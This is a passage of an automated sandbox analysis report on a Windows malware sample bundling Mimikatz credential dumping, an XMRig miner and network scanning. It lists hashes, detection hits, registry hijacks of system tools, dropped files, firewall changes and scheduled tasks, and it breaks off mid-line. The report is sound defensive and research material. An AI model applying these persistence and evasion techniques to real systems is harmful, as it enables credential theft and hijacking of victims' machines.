Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09-04-2024 01:49
Behavioral task
behavioral1
Sample
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
-
Size
17.3MB
-
MD5
f44f00bd6fdabcab90742047cca0ba6a
-
SHA1
74f7b7d30ba4f1617d88b54727c18571c9d653ad
-
SHA256
f0329a613971c28b2db7b5adf34ed67d0a962e5a10ee2bcb77d3b92b8e03d294
-
SHA512
63a939a5bd20fb7ff5f4137998e1bb5ce656800cb82142f03c28bda75adb7f0a1ca2993cc4cd45de8052433426cf8e1346e35ec1c60104d92d377c7e7eb7df61
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
kbejuig.exedescription pid process target process PID 1612 created 2132 1612 kbejuig.exe spoolsv.exe -
Contacts a large (29289) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 38 IoCs
Processes:
resource yara_rule behavioral2/memory/800-0-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX C:\Windows\mitbajei\kbejuig.exe UPX C:\Windows\mfckutrue\Corporate\vfshost.exe UPX behavioral2/memory/1144-134-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp UPX behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp UPX C:\Windows\Temp\mfckutrue\ligfuakbd.exe UPX behavioral2/memory/432-140-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/432-143-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX C:\Windows\Temp\ycubiyfde\kayllc.exe UPX behavioral2/memory/3260-151-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/4392-171-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/2960-175-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/4608-179-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3260-181-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/3324-184-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3760-188-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3260-190-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/372-194-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3260-201-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/4072-203-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/4948-207-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/4856-211-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3260-215-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/1100-216-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/2600-220-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3260-223-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/1604-225-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/2412-229-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/4540-232-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/220-233-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3260-235-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/1144-237-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp UPX behavioral2/memory/3260-248-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/3260-249-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/3260-251-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/3260-253-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/3260-254-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX behavioral2/memory/3260-255-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/3260-181-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-190-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-201-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-215-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-223-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-235-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-248-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-249-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-251-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-253-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-254-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig behavioral2/memory/3260-255-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
Processes:
resource yara_rule behavioral2/memory/800-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz C:\Windows\mitbajei\kbejuig.exe mimikatz behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
kbejuig.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts kbejuig.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts kbejuig.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 1984 netsh.exe 1276 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
kbejuig.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" kbejuig.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe kbejuig.exe -
Executes dropped EXE 28 IoCs
Processes:
kbejuig.exekbejuig.exewpcap.execrtyfytge.exevfshost.exeligfuakbd.exexohudmc.exekayllc.exeogiqci.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exekbejuig.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeiljtkedpu.exekbejuig.exepid process 1688 kbejuig.exe 1612 kbejuig.exe 644 wpcap.exe 1712 crtyfytge.exe 1144 vfshost.exe 432 ligfuakbd.exe 4360 xohudmc.exe 3260 kayllc.exe 1624 ogiqci.exe 4392 ligfuakbd.exe 2960 ligfuakbd.exe 4608 ligfuakbd.exe 3324 ligfuakbd.exe 3760 ligfuakbd.exe 372 ligfuakbd.exe 4420 kbejuig.exe 4072 ligfuakbd.exe 4948 ligfuakbd.exe 4856 ligfuakbd.exe 1100 ligfuakbd.exe 2600 ligfuakbd.exe 1604 ligfuakbd.exe 2412 ligfuakbd.exe 4540 ligfuakbd.exe 220 ligfuakbd.exe 1144 ligfuakbd.exe 2368 iljtkedpu.exe 5328 kbejuig.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.execrtyfytge.exepid process 644 wpcap.exe 644 wpcap.exe 644 wpcap.exe 644 wpcap.exe 644 wpcap.exe 644 wpcap.exe 644 wpcap.exe 644 wpcap.exe 644 wpcap.exe 1712 crtyfytge.exe 1712 crtyfytge.exe 1712 crtyfytge.exe -
Processes:
resource yara_rule C:\Windows\mfckutrue\Corporate\vfshost.exe upx behavioral2/memory/1144-134-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp upx behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp upx C:\Windows\Temp\mfckutrue\ligfuakbd.exe upx behavioral2/memory/432-140-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/432-143-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx C:\Windows\Temp\ycubiyfde\kayllc.exe upx behavioral2/memory/3260-151-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/4392-171-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/2960-175-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/4608-179-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3260-181-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/3324-184-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3760-188-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3260-190-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/372-194-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3260-201-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/4072-203-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/4948-207-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/4856-211-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3260-215-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/1100-216-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/2600-220-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3260-223-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/1604-225-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/2412-229-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/4540-232-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/220-233-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3260-235-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/1144-237-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp upx behavioral2/memory/3260-248-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/3260-249-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/3260-251-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/3260-253-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/3260-254-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx behavioral2/memory/3260-255-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 69 ifconfig.me 70 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
xohudmc.exekbejuig.exewpcap.exedescription ioc process File created C:\Windows\SysWOW64\ogiqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft kbejuig.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 kbejuig.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A kbejuig.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A kbejuig.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 kbejuig.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE kbejuig.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache kbejuig.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ogiqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData kbejuig.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies kbejuig.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 kbejuig.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content kbejuig.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
kbejuig.execmd.exe2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exeiljtkedpu.exedescription ioc process File created C:\Windows\mfckutrue\UnattendGC\docmicfg.xml kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\docmicfg.xml kbejuig.exe File created C:\Windows\mfckutrue\tbejirgpe\iljtkedpu.exe kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\tucl-1.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\schoedcl.xml kbejuig.exe File created C:\Windows\mfckutrue\upbdrjv\swrpwe.exe kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\libxml2.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\vimpcsvc.xml kbejuig.exe File created C:\Windows\mfckutrue\tbejirgpe\wpcap.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\vimpcsvc.xml kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\crli-0.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\posh-0.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\tibe-2.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\spoolsrv.xml kbejuig.exe File created C:\Windows\mitbajei\svschost.xml kbejuig.exe File opened for modification C:\Windows\mfckutrue\Corporate\log.txt cmd.exe File created C:\Windows\mfckutrue\tbejirgpe\wpcap.exe kbejuig.exe File opened for modification C:\Windows\mitbajei\vimpcsvc.xml kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\AppCapture64.dll kbejuig.exe File created C:\Windows\mfckutrue\Corporate\mimidrv.sys kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\zlib1.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\schoedcl.xml kbejuig.exe File created C:\Windows\mitbajei\docmicfg.xml kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\Shellcode.ini kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\AppCapture32.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\coli-0.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\trch-1.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\svschost.exe kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\svschost.xml kbejuig.exe File created C:\Windows\mitbajei\spoolsrv.xml kbejuig.exe File opened for modification C:\Windows\mitbajei\kbejuig.exe 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe File created C:\Windows\mfckutrue\UnattendGC\specials\ucl.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\xdvl-0.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\spoolsrv.exe kbejuig.exe File created C:\Windows\mitbajei\vimpcsvc.xml kbejuig.exe File opened for modification C:\Windows\mitbajei\svschost.xml kbejuig.exe File created C:\Windows\mfckutrue\tbejirgpe\scan.bat kbejuig.exe File created C:\Windows\mfckutrue\tbejirgpe\Packet.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\vimpcsvc.exe kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\exma-1.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\ssleay32.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\spoolsrv.xml kbejuig.exe File opened for modification C:\Windows\mitbajei\docmicfg.xml kbejuig.exe File created C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\docmicfg.exe kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\schoedcl.exe kbejuig.exe File created C:\Windows\mitbajei\schoedcl.xml kbejuig.exe File opened for modification C:\Windows\mitbajei\schoedcl.xml kbejuig.exe File created C:\Windows\mfckutrue\Corporate\vfshost.exe kbejuig.exe File created C:\Windows\mfckutrue\Corporate\mimilib.dll kbejuig.exe File opened for modification C:\Windows\mfckutrue\tbejirgpe\Result.txt iljtkedpu.exe File opened for modification C:\Windows\mfckutrue\tbejirgpe\Packet.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\cnli-1.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\svschost.xml kbejuig.exe File created C:\Windows\ime\kbejuig.exe kbejuig.exe File created C:\Windows\mitbajei\kbejuig.exe 2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe File created C:\Windows\mfckutrue\UnattendGC\specials\libeay32.dll kbejuig.exe File created C:\Windows\mfckutrue\UnattendGC\specials\trfo-2.dll kbejuig.exe File opened for modification C:\Windows\mitbajei\spoolsrv.xml kbejuig.exe File created C:\Windows\mfckutrue\tbejirgpe\ip.txt kbejuig.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 2052 sc.exe 4128 sc.exe 644 sc.exe 4036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\mitbajei\kbejuig.exe nsis_installer_2 C:\Windows\mfckutrue\tbejirgpe\wpcap.exe nsis_installer_1 C:\Windows\mfckutrue\tbejirgpe\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 5044 schtasks.exe 2092 schtasks.exe 912 schtasks.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
ligfuakbd.exeligfuakbd.exeligfuakbd.exekbejuig.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exeligfuakbd.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kbejuig.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kbejuig.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kbejuig.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing kbejuig.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kbejuig.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ligfuakbd.exe Key created \REGISTRY\USER\.DEFAULT\Software ligfuakbd.exe Set 